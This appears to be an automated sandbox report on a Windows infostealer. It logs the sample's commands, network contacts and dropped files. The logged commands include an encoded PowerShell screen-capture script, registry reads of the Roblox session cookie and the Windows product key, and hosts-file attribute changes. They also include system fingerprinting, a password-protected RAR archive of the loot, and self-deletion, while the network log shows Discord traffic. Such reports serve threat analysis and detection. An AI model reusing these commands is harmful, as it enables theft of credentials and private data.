powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mztqsn5r\mztqsn5r.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E9.tmp" "c:\Users\Admin\AppData\Local\Temp\mztqsn5r\CSCF4D9769ABFF04899BC49BE9CC0D64E8.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8c114cc40,0x7ff8c114cc4c,0x7ff8c114cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1980,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4400 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5392,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4836,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5540 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3456,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:8

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 ptb.discord.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 chrome.google.com udp
GB 142.250.200.10:443 ogads-pa.googleapis.com tcp
GB 172.217.16.238:443 play.google.com tcp
GB 216.58.201.110:443 chrome.google.com tcp
GB 142.250.200.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 172.217.16.238:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 clients2.google.com tcp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
GB 172.217.169.3:443 beacons.gcp.gvt2.com tcp
GB 104.86.110.128:443 tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp
US 95.100.195.173:443 r.bing.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI43082\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

C:\Users\Admin\AppData\Local\Temp\_MEI43082\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/352-25-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\base_library.zip

MD5 1c9a020e8bfc99a77f51c7d5ceb937f1
SHA1 9b2c6f0c4d16ac0b69e5232648b6e6c5df39cd9c
SHA256 2ce10a77f29612f9afd3fb21baaf38162fdc484174aec051a32eeaef28ce8b37
SHA512 98312712c4be133d979b9699e661c451cd8c27ae4c5abc295c359fd857d20b3fde55e6555bdd2230d580903bb230798fba2c72381b263327f5d0820d28ddfbea

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_ctypes.pyd

MD5 7ecc651b0bcf9b93747a710d67f6c457
SHA1 ebb6dcd3998af9fff869184017f2106d7a9c18f3
SHA256 b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a
SHA512 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

C:\Users\Admin\AppData\Local\Temp\_MEI43082\libffi-8.dll

MD5 87786718f8c46d4b870f46bcb9df7499
SHA1 a63098aabe72a3ed58def0b59f5671f2fd58650b
SHA256 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33
SHA512 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

memory/352-48-0x00007FF8DC230000-0x00007FF8DC23F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_ssl.pyd

MD5 8f94142c7b4015e780011c1b883a2b2f
SHA1 c9c3c1277cca1e8fe8db366ca0ecb4a264048f05
SHA256 8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c
SHA512 7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_sqlite3.pyd

MD5 72a0715cb59c5a84a9d232c95f45bf57
SHA1 3ed02aa8c18f793e7d16cc476348c10ce259feb7
SHA256 d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad
SHA512 73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_socket.pyd

MD5 57dc6a74a8f2faaca1ba5d330d7c8b4b
SHA1 905d90741342ac566b02808ad0f69e552bb08930
SHA256 5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca
SHA512 5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_queue.pyd

MD5 f1e7c157b687c7e041deadd112d61316
SHA1 2a7445173518a342d2e39b19825cf3e3c839a5fe
SHA256 d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339
SHA512 982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_lzma.pyd

MD5 71f0b9f90aa4bb5e605df0ea58673578
SHA1 c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e
SHA256 d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535
SHA512 fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_hashlib.pyd

MD5 7edb6c172c0e44913e166abb50e6fba6
SHA1 3f8c7d0ff8981d49843372572f93a6923f61e8ed
SHA256 258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531
SHA512 2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_decimal.pyd

MD5 0cfe09615338c6450ac48dd386f545fd
SHA1 61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe
SHA256 a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3
SHA512 42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

C:\Users\Admin\AppData\Local\Temp\_MEI43082\_bz2.pyd

MD5 83b5d1943ac896a785da5343614b16bc
SHA1 9d94b7f374030fed7f6e876434907561a496f5d9
SHA256 bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a
SHA512 5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

C:\Users\Admin\AppData\Local\Temp\_MEI43082\unicodedata.pyd

MD5 908e8c719267692de04434ab9527f16e
SHA1 5657def35fbd3e5e088853f805eddd6b7b2b3ce9
SHA256 4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239
SHA512 4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

memory/352-39-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43082\sqlite3.dll

MD5 abe8eec6b8876ddad5a7d60640664f40
SHA1 0b3b948a1a29548a73aaf8d8148ab97616210473
SHA256 26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d
SHA512 de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

C:\Users\Admin\AppData\Local\Temp\_MEI43082\select.pyd

MD5 938c814cc992fe0ba83c6f0c78d93d3f
SHA1 e7c97e733826e53ff5f1317b947bb3ef76adb520
SHA256 9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e
SHA512 2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
